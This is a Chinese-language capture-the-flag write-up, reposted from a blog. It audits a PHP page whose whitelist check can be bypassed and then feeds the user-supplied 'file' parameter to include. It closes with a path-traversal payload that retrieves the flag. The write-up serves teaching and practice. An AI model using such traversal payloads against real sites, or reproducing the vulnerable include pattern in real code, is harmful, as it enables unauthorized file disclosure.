只有一个表情,没有其他的信息,因此我们进行查看源码,发现source.php
2、访问source.php可以看的出来是代码审计
因此我们需要对其代码进行了解
"source.php","hint"=>"hint.php"]; #白名单 if (! isset($page) || !is_string($page)) { #isset()判断是否为空为空-true不为空-false is_string 判断是否是字符串 是则为true,否则为false echo "you can't see it"; return false; } if (in_array($page, $whitelist)) { #inarray()检测$page在不在$whitelist中,在为true,否则为false return true; } $_page = mb_substr( #mb_stustr截取字符串 mb_strpos查找字符串 $page, 0, mb_strpos($page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } $_page = urldecode($page); #进行一次url解码 $_page = mb_substr( $_page, 0, mb_strpos($_page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } echo "you can't see it"; return false; } } if (! empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file']) ) { include $_REQUEST['file']; #动态包含 include语句包含并运行指定文件 #如果定义了路径一-- 不管是绝对路径(在Windows下以盘符或者| 开头,在Unix/Linux下以/开头)还是当前目录的相对路径(以. 或者…开头) #--include_ path 都会被完全忽略。例如一个文件以.开头,则解析器会在当前目录的父目录下寻找该文件。 exit; } else { echo "
"; }
了解了源代码后,我们就可以构建flag
在代码审计的时候我们需要看清楚$page和$_page不要看混了
3、构建payload,得到flag
?file=hint.php?../../../../../ffffllllaaaagggg
来源地址:https://blog.csdn.net/qq_62794597/article/details/127795151